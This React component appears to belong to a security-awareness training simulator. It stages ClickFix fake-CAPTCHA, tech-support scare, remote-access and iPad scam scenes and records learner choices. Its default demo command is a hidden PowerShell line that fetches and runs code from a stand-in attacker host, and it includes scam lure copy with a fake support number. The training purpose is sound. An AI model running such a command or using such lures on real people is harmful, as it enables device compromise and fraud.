import { useEffect, useRef, useState, type ReactNode } from "react";
import type { ClickFixConfig, DesktopConfig } from "../../scenario/types";
import { Desktop } from "../Desktop";
import { WindowTitlebar } from "../WindowTitlebar";
import { audio } from "../../lib/audio";
import { activeTtsLang } from "../../lib/locale";
import { IpadFrame, type MfitDone, type MfitGuideFn } from "../mfit/shared";
import { Takeover } from "./Takeover";
import "./clickfix.css";

/**
 * "The Fake Browser Fix" (ClickFix / fake CAPTCHA / tech-support deception).
 * Rendered inside the reused Windows Desktop (office monitor or bar laptop).
 *  - baseline: what a legitimate CAPTCHA + software update look like.
 *  - captcha : fake "CloudShield" verification pushes the learner OUT of the
 *              browser into Run / Windows Terminal to paste a command.
 *  - scare   : a fullscreen "Windows Security Alert" lock with a phone number.
 * The device never runs anything; "following" the steps is the compromise.
 * Reports {key, eventId, evidence} up through App's mfitDone.
 */
type Stage =
  | "desktop"
  | "site"
  | "captcha_ok"
  | "update"
  | "baseline_done"
  | "captcha"
  | "instruct"
  | "inspect"
  | "run"
  | "terminal"
  | "running"
  | "scare"
  | "scare_closed";

const DESK_APPS = [
  { id: "browser", label: "Browser", icon: "chrome", opens: "browser" },
  { id: "outlook", label: "Mail", icon: "outlook", opens: "outlook" },
  { id: "teams", label: "Teams", icon: "teams", opens: "teams" },
  { id: "files", label: "File Explorer", icon: "files", opens: "files" },
];

function Chrome({ url, secure = true, children }: { url: string; secure?: boolean; children: ReactNode }) {
  return (
    <div className="cfx-win cfx-browser">
      <WindowTitlebar title="Chrome" />
      <div className="cfx-addr">
        <span className="cfx-addr-nav" aria-hidden="true">{"\u2039 \u203A \u21BB"}</span>
        <span className="cfx-addr-url">
          <i aria-hidden="true">{secure ? "\u{1F512}" : "\u26A0"}</i>
          {url}
        </span>
      </div>
      <div className="cfx-page">{children}</div>
    </div>
  );
}

export function ClickFix({ config, onDone, onGuideChange }: { config: ClickFixConfig; onDone: (d: MfitDone) => void; onGuideChange?: MfitGuideFn }) {
  // the trap and the remote-tool page open straight in the browser (from a link)
  const start: Stage = config.mode === "captcha" || config.mode === "remote" ? "site" : "desktop";
  const [stage, setStage] = useState<Stage>(start);
  const doneRef = useRef(false);
  const finish = (d: MfitDone) => {
    if (doneRef.current) return;
    doneRef.current = true;
    onDone(d);
  };

  const guideKey = `${config.mode}_${stage}`;
  useEffect(() => {
    onGuideChange?.(config.guide?.[guideKey] ?? config.guide?.[stage] ?? null);
  }, [guideKey, stage, config.guide, onGuideChange]);
  useEffect(() => () => onGuideChange?.(null), [onGuideChange]);

  // scare page: looping alarm + a spoken "security" warning while it blinks
  const scareLine =
    config.scareVoiceLine ??
    "Critical alert from Windows Security. Your computer has been infected. Do not turn off your computer. Call support immediately.";
  const scareVoice = { voice: config.scareVoice ?? "shimmer", lang: activeTtsLang() };
  useEffect(() => {
    if (config.mode === "scare") void audio.prefetchSpeech(scareLine, scareVoice);
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, []);
  useEffect(() => {
    if (stage !== "scare") return;
    audio.startRansomAlarm();
    const t = window.setTimeout(() => void audio.speak(scareLine, scareVoice), 900);
    return () => {
      window.clearTimeout(t);
      audio.stopRansomAlarm();
      audio.cancelSpeech();
    };
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [stage]);

  const appId = "browser";
  const deskConfig: DesktopConfig = { clock: config.clock, date: config.date, icons: DESK_APPS, taskbar: DESK_APPS };
  const browserOpen = stage !== "desktop";

  const choices = (items: { id: string; label: string; blurb?: string; danger?: boolean; onClick: () => void; pulse?: boolean }[], prompt?: string) => (
    <div className="cfx-choices">
      {prompt && <div className="cfx-choices-q">{prompt}</div>}
      <div className="cfx-choices-grid">
        {items.map((c) => (
          <button key={c.id} type="button" className={`cfx-choice${c.danger ? " is-danger" : ""}${c.pulse ? " cf-pulse-target" : ""}`} onClick={c.onClick}>
            <span className="cfx-choice-l">{c.label}</span>
            {c.blurb && <span className="cfx-choice-b">{c.blurb}</span>}
          </button>
        ))}
      </div>
    </div>
  );

  const cfxCmd = config.command ?? "powershell -w hidden -c \"iwr https://cloudshield-verify.com/fix | iex\"";

  let page: ReactNode = null;

  // ---------- baseline: legitimate CAPTCHA + software update ----------
  if (config.mode === "baseline") {
    if (stage === "site" || stage === "captcha_ok") {
      page = (
        <Chrome url={config.siteUrl ?? "portal.northbay.internal/suppliers"}>
          <div className="cfx-sitecard">
            <div className="cfx-site-h">{config.siteTitle ?? "Supplier portal"}</div>
            <p>{config.siteBody ?? "Sign in to review this quarter's supplier quote."}</p>
            <div className="cfx-captcha is-real">
              <button
                type="button"
                className={`cfx-cap-check${stage === "captcha_ok" ? " is-on" : " cf-pulse-target"}`}
                onClick={() => {
                  audio.ui("pageOpen");
                  setStage("captcha_ok");
                }}
                aria-pressed={stage === "captcha_ok"}
              >
                <span className="cfx-cap-box">{stage === "captcha_ok" ? "\u2713" : ""}</span>
                I'm not a robot
              </button>
              <span className="cfx-cap-brand">reCAPTCHA</span>
            </div>
            {stage === "captcha_ok" && (
              <div className="cfx-note is-good">
                <b>That is a normal CAPTCHA.</b> It stayed inside the browser and only asked for a click.
                <button type="button" className="cfx-btn cf-pulse-target" onClick={() => setStage("update")}>
                  Continue
                </button>
              </div>
            )}
          </div>
        </Chrome>
      );
    } else if (stage === "update" || stage === "baseline_done") {
      page = (
        <Chrome url="softwarecenter.northbay.internal">
          <div className="cfx-swcenter">
            <div className="cfx-sw-h">
              <span className="cfx-sw-logo" aria-hidden="true" />
              <b>NorthBay Software Center</b>
            </div>
            <div className="cfx-sw-row">
              <span className="cfx-sw-ico" aria-hidden="true" />
              <span>
                <b>Chrome update available</b>
                <small>Approved by IT. Installs through the company Software Center.</small>
              </span>
              {stage === "update" ? (
                <button
                  type="button"
                  className="cfx-btn cfx-btn--primary cf-pulse-target"
                  onClick={() => {
                    audio.ui("success");
                    setStage("baseline_done");
                  }}
                >
                  Install
                </button>
              ) : (
                <span className="cfx-sw-ok">Installed</span>
              )}
            </div>
            {stage === "baseline_done" && (
              <div className="cfx-note is-good">
                <b>This is how a real update works:</b> through approved company software, not a web pop-up.
                <button type="button" className="cfx-btn cf-pulse-target" onClick={() => finish({ key: "done" })}>
                  Back to work
                </button>
              </div>
            )}
          </div>
        </Chrome>
      );
    }
  }

  // ---------- captcha: the ClickFix trap ----------
  if (config.mode === "captcha") {
    if (stage === "site") {
      page = (
        <Chrome url={config.siteUrl ?? "supplier-quote-preview.com/q/8f3k2"}>
          <div className="cfx-loading">
            <span className="cfx-spin" aria-hidden="true" />
            Loading the shared document...
            <button
              type="button"
              className="cfx-btn cf-pulse-target"
              onClick={() => {
                audio.ui("alert");
                setStage("captcha");
              }}
            >
              Continue
            </button>
          </div>
        </Chrome>
      );
    } else if (stage === "captcha") {
      page = (
        <Chrome url={config.siteUrl ?? "supplier-quote-preview.com/q/8f3k2"}>
          <div className="cfx-overlay">
            <div className="cfx-cs-card">
              <div className="cfx-cs-brand">
                <span className="cfx-cs-logo" aria-hidden="true" />
                {config.verifyBrand ?? "CloudShield Verification"}
              </div>
              <p>{config.verifyLine ?? "This site is protected. Complete human verification to continue."}</p>
              <button type="button" className="cfx-cap-check cf-pulse-target" onClick={() => { audio.ui("pageOpen"); setStage("instruct"); }}>
                <span className="cfx-cap-box" />
                Verify you are human
              </button>
            </div>
          </div>
        </Chrome>
      );
    } else if (stage === "instruct" || stage === "inspect") {
      page = (
        <Chrome url={config.siteUrl ?? "supplier-quote-preview.com/q/8f3k2"} secure={false}>
          <div className="cfx-overlay">
            {stage === "inspect" ? (
              <div className="cfx-cs-card cfx-inspect">
                <div className="cfx-cs-brand"><span className="cfx-cs-logo" aria-hidden="true" />What is this page asking?</div>
                <ul className="cfx-flags">
                  <li><b>It wants you to leave the browser.</b> Win+R, Terminal and PowerShell are parts of Windows, not a website step.</li>
                  <li><b>A command was copied to your clipboard.</b> You would be running the attacker's command yourself.</li>
                  <li><b>A real CAPTCHA never needs this.</b> It stays inside the browser and only asks for a click.</li>
                </ul>
                <button type="button" className="cfx-btn cf-pulse-target" onClick={() => setStage("instruct")}>Back to the page</button>
              </div>
            ) : (
              <div className="cfx-cs-card cfx-fail">
                <div className="cfx-cs-brand"><span className="cfx-cs-logo" aria-hidden="true" />Verification failed</div>
                <p>To finish verification, complete the quick browser repair:</p>
                <ol className="cfx-steps">
                  <li><kbd>Windows</kbd> + <kbd>R</kbd></li>
                  <li><kbd>Ctrl</kbd> + <kbd>V</kbd></li>
                  <li><kbd>Enter</kbd></li>
                </ol>
                <p className="cfx-alt">Or open <b>Windows Terminal</b> and paste the copied fix command.</p>
                {choices(
                  [
                    { id: "follow", label: "Follow the steps", blurb: "Press Win+R and paste.", danger: true, pulse: config.replay, onClick: () => { audio.ui("alert"); setStage("run"); } },
                    { id: "terminal", label: "Open Windows Terminal", blurb: "Paste the fix command.", danger: true, onClick: () => { audio.ui("alert"); setStage("terminal"); } },
                    { id: "inspect", label: "Look closer at the page", blurb: "What is it really asking?", onClick: () => setStage("inspect") },
                    { id: "close", label: "Close the tab", blurb: "Leave the page.", onClick: () => finish({ key: "closed", eventId: config.events?.closed, evidence: "Closed the fake verification page" }) },
                    { id: "report", label: "Report it to IT", blurb: "Use the Report button.", onClick: () => finish({ key: "reported", eventId: config.events?.reported, evidence: "Reported the ClickFix page to IT" }) },
                    { id: "callit", label: "Call IT from the directory", blurb: "Check with the real service desk.", onClick: () => finish({ key: "verified", eventId: config.events?.verified, evidence: "Checked with the real IT service desk" }) },
                  ].filter((c) => !config.replay || c.id === "follow"),
                  config.replay ? "What would have happened" : "What do you do?",
                )}
              </div>
            )}
          </div>
        </Chrome>
      );
    } else if (stage === "run" || stage === "running") {
      page = (
        <Chrome url={config.siteUrl ?? "supplier-quote-preview.com/q/8f3k2"} secure={false}>
          <div className="cfx-overlay is-dim">
            <div className="cfx-run" role="dialog" aria-label="Run">
              <div className="cfx-run-h"><span className="cfx-run-logo" aria-hidden="true" />Run</div>
              <p>Type the name of a program, folder, or document, and Windows will open it for you.</p>
              <label className="cfx-run-field">
                <span>Open:</span>
                <input value={cfxCmd} readOnly aria-label="Open" />
              </label>
              {stage === "running" ? (
                <div className="cfx-run-exec"><span className="cfx-spin" aria-hidden="true" />Running...</div>
              ) : (
                <div className="cfx-run-btns">
                  <button type="button" className={`cfx-btn cfx-btn--primary${config.replay ? " cf-pulse-target" : ""}`} onClick={() => { setStage("running"); audio.ui("error"); window.setTimeout(() => finish({ key: "ran", eventId: config.replay ? undefined : config.events?.ran, evidence: "Pasted and ran the command from the fake page" }), 1700); }}>OK</button>
                  {!config.replay && <button type="button" className="cfx-btn" onClick={() => setStage("instruct")}>Cancel</button>}
                </div>
              )}
              {stage !== "running" && <p className="cfx-run-hint">Ctrl+V pasted the command the page copied. You never typed it.</p>}
            </div>
          </div>
        </Chrome>
      );
    } else if (stage === "terminal") {
      page = (
        <Chrome url={config.siteUrl ?? "supplier-quote-preview.com/q/8f3k2"} secure={false}>
          <div className="cfx-overlay is-dim">
            <div className="cfx-term" role="dialog" aria-label="Windows Terminal">
              <div className="cfx-term-h"><span>Windows Terminal</span><span className="cfx-term-ctl" aria-hidden="true">{"\u2013 \u25A1 \u2715"}</span></div>
              <div className="cfx-term-body">
                <div className="cfx-term-line">PS C:\Users\alex&gt; <span className="cfx-term-paste">{cfxCmd}</span><span className="cfx-caret" /></div>
              </div>
              <div className="cfx-run-btns">
                <button type="button" className="cfx-btn cfx-btn--primary" onClick={() => { setStage("running"); audio.ui("error"); window.setTimeout(() => finish({ key: "ran", eventId: config.replay ? undefined : config.events?.ran, evidence: "Pasted and ran the command in Windows Terminal" }), 1700); }}>Press Enter to run</button>
                <button type="button" className="cfx-btn" onClick={() => setStage("instruct")}>Close the terminal</button>
              </div>
            </div>
          </div>
        </Chrome>
      );
    }
  }

  // ---------- scare: fullscreen tech-support lock ----------
  if (config.mode === "scare") {
    if (stage === "site") {
      page = (
        <Chrome url={config.siteUrl ?? "webmail.northbay-mail.com"}>
          <div className="cfx-loading">
            <span className="cfx-spin" aria-hidden="true" />
            Opening your expense receipt...
            <button type="button" className="cfx-btn cf-pulse-target" onClick={() => { audio.ui("alert"); setStage("scare"); }}>Continue</button>
          </div>
        </Chrome>
      );
    } else if (stage === "scare") {
      page = (
        <div className="cfx-scare" role="dialog" aria-label="Security alert">
          <div className="cfx-scare-bar">{"\u26A0"} {config.scareBrand ?? "Windows Security Center"}</div>
          <div className="cfx-scare-body">
            <div className="cfx-scare-t">{config.scareTitle ?? "Suspicious activity detected"}</div>
            <p>{config.scareBody ?? "Your browser has been locked to protect your data. Do not close this window or restart your computer."}</p>
            <div className="cfx-scare-phone">Call support immediately: <b>{config.scarePhone ?? "+1 800 555 0100"}</b></div>
            {choices(
              [
                { id: "call", label: "Call the number", blurb: "Speak to support now.", danger: true, onClick: () => finish({ key: "call", eventId: config.events?.called, evidence: "Called the number on the scare page" }) },
                { id: "close", label: "Close the tab", blurb: "Use the browser controls.", onClick: () => setStage("scare_closed") },
                { id: "wifi", label: "Disconnect from Wi-Fi", blurb: "Then deal with the page.", onClick: () => setStage("scare_closed") },
                { id: "callit", label: "Contact real IT", blurb: "Use the number you already know.", onClick: () => finish({ key: "verified", eventId: config.events?.verified, evidence: "Contacted the real IT service desk" }) },
              ],
              "What do you do?",
            )}
          </div>
        </div>
      );
    } else if (stage === "scare_closed") {
      page = (
        <Chrome url="about:blank">
          <div className="cfx-note is-good cfx-closed">
            <b>You closed the page.</b> No legitimate Microsoft or Windows warning shows a phone number. The number itself was the trap.
            <button type="button" className="cfx-btn cf-pulse-target" onClick={() => finish({ key: "closed", eventId: config.events?.closed, evidence: "Closed the tech-support scare page" })}>Continue</button>
          </div>
        </Chrome>
      );
    }
  }

  // ---------- remote: the support caller's remote-access tool ----------
  if (config.mode === "remote") {
    const code = config.remoteCode ?? "482 917";
    const tool = config.remoteTool ?? "QuickHelp Remote";
    if (stage === "site") {
      page = (
        <Chrome url={config.siteUrl ?? "quickhelp-support.com/join"}>
          <div className="cfx-sitecard cfx-remote">
            <div className="cfx-site-h">{tool}</div>
            <p>Enter the code your support technician gave you to start the session.</p>
            <div className="cfx-codebox">{code}</div>
            <button type="button" className="cfx-btn cfx-btn--primary cf-pulse-target" onClick={() => { audio.ui("pageOpen"); setStage("instruct"); }}>
              Connect
            </button>
          </div>
        </Chrome>
      );
    } else if (stage === "instruct") {
      page = (
        <Chrome url={config.siteUrl ?? "quickhelp-support.com/join"}>
          <div className="cfx-overlay">
            <div className="cfx-cs-card">
              <div className="cfx-cs-brand"><span className="cfx-cs-logo is-remote" aria-hidden="true" />{tool}</div>
              <p><b>{config.remoteAgent ?? "Support technician"}</b> wants to view and control your device.</p>
              <p className="cfx-alt">They will be able to see your screen, open files and run programs.</p>
              <div className="cfx-run-btns">
                {!config.replay && (
                  <button type="button" className="cfx-btn" onClick={() => finish({ key: "denied", eventId: config.events?.denied, evidence: "Refused remote control of the laptop" })}>
                    Deny
                  </button>
                )}
                <button
                  type="button"
                  className={`cfx-btn cfx-btn--primary${config.replay ? " cf-pulse-target" : ""}`}
                  onClick={() => { audio.ui("error"); finish({ key: "allowed", eventId: config.replay ? undefined : config.events?.allowed, evidence: "Allowed the caller to control the laptop" }); }}
                >
                  Allow
                </button>
              </div>
            </div>
          </div>
        </Chrome>
      );
    }
  }

  // ---------- ipad: the beach-bar recognition scene ----------
  if (config.mode === "ipad") {
    return <IpadScene config={config} finish={finish} />;
  }
  // ---------- takeover: the scammer's remote session ----------
  if (config.mode === "takeover") {
    return <Takeover config={config} finish={finish} />;
  }

  const onOpen = (id: string) => {
    if (stage === "desktop" && id === appId) setStage("site");
  };

  return (
    <Desktop
      config={deskConfig}
      className="cfx-desk"
      highlightAppId={stage === "desktop" ? appId : undefined}
      openAppIds={browserOpen ? [appId] : []}
      activeAppId={browserOpen ? appId : null}
      toast={stage === "desktop" && config.toast ? { from: config.toast.from, subject: config.toast.subject, appId } : null}
      onOpen={onOpen}
    >
      {browserOpen && page}
    </Desktop>
  );
}

/** Beach-bar iPad: a fake "Allow notifications" prompt and a fake support chat. */
function IpadScene({ config, finish }: { config: ClickFixConfig; finish: (d: MfitDone) => void }) {
  const [picked, setPicked] = useState<string | null>(null);
  const site = config.ipadSite ?? "beach-deals.travel";
  const result =
    picked === "allow"
      ? { tone: "warn", title: "You allowed the notifications", body: "The site can now push fake \u201cvirus found\u201d and \u201cyour device is infected\u201d alerts to this iPad, each one leading to a scam page or a support number." }
      : picked === "chat"
      ? { tone: "warn", title: "That was not Apple", body: "The chat bubble is part of the web page. A real support service does not pop up uninvited on a travel site and ask you to install a profile." }
      : { tone: "good", title: "You closed it", body: "Same trick, different device: fake urgency, a fake fix and a fake helper. Nothing on a web page needs you to allow, install or call anything to keep reading." };
  return (
    <IpadFrame expanded clock={config.clock}>
      <div className="cfx-ipad">
        <div className="cfx-safari-bar">
          <span className="cfx-safari-ic" aria-hidden="true">{"\u25A4"}</span>
          <span className="cfx-safari-ic" aria-hidden="true">{"\u2039"}</span>
          <span className="cfx-safari-ic is-dim" aria-hidden="true">{"\u203A"}</span>
          <div className="cfx-safari-addr">
            <span className="cfx-safari-aa">AA</span>
            <span className="cfx-safari-host">
              <i aria-hidden="true">{"\u{1F512}"}</i>
              {site}
            </span>
            <span className="cfx-safari-ic" aria-hidden="true">{"\u21BB"}</span>
          </div>
          <span className="cfx-safari-ic" aria-hidden="true">{"\u2B06"}</span>
          <span className="cfx-safari-ic" aria-hidden="true">+</span>
          <span className="cfx-safari-ic" aria-hidden="true">{"\u29C9"}</span>
        </div>
        <div className="cfx-ipad-page">
          <div className={`cfx-site${!picked ? " is-dim" : ""}`}>
            <header className="cfx-site-nav">
              <b>
                <span className="cfx-site-logo" aria-hidden="true" />
                BeachDeals
              </b>
              <nav>
                <span>Hotels</span>
                <span>Flights</span>
                <span>Last minute</span>
                <span>Sign in</span>
              </nav>
            </header>
            <div className="cfx-site-hero">
              <span className="cfx-site-sun" aria-hidden="true" />
              <div>
                <small>Members only</small>
                <b>Beachfront hotels, up to 60% off</b>
                <span>Tonight only. 14 rooms left in Mallorca.</span>
              </div>
            </div>
            <div className="cfx-site-deals">
              {[
                ["Hotel Cala Blanca", "Mallorca", "CHF 89"],
                ["Mar Azul Resort", "Algarve", "CHF 112"],
                ["Sunset Bay Suites", "Crete", "CHF 97"],
              ].map(([n, p, c], i) => (
                <div key={n} className="cfx-site-deal">
                  <span className={`cfx-site-thumb t${i}`} aria-hidden="true" />
                  <b>{n}</b>
                  <small>{p}</small>
                  <em>{c} / night</em>
                </div>
              ))}
            </div>
          </div>
          {!picked && (
            <div className="cfx-ipad-perm" role="dialog">
              <b>&ldquo;{site}&rdquo; Would Like to Send You Notifications</b>
              <span>{config.ipadPrompt ?? "Tap Allow to continue to your secure content."}</span>
              <div className="cfx-ipad-perm-btns">
                <button type="button" onClick={() => setPicked("close")}>Don&rsquo;t Allow</button>
                <button type="button" onClick={() => { audio.ui("error"); setPicked("allow"); }}>Allow</button>
              </div>
            </div>
          )}
          {!picked && (
            <button type="button" className="cfx-ipad-chat" onClick={() => { audio.ui("error"); setPicked("chat"); }}>
              <span className="cfx-ipad-chat-ico" aria-hidden="true" />
              <span>
                <b>Apple Support</b>
                <small>Your iPad may be at risk. Tap to start secure help.</small>
              </span>
            </button>
          )}
          {picked && (
            <div className={`cfx-note cfx-ipad-res is-${result.tone}`}>
              <b>{result.title}</b>
              <span>{result.body}</span>
              <button
                type="button"
                className="cfx-btn cf-pulse-target"
                onClick={() =>
                  finish({
                    key: picked === "close" ? "closed" : "tapped",
                    eventId: picked === "close" ? config.events?.closed : picked === "allow" ? config.events?.allowed : config.events?.called,
                    evidence: picked === "close" ? "Refused the fake notification and support prompts" : picked === "allow" ? "Allowed notifications from a scam site" : "Opened a fake support chat",
                  })
                }
              >
                Continue
              </button>
            </div>
          )}
        </div>
      </div>
    </IpadFrame>
  );
}
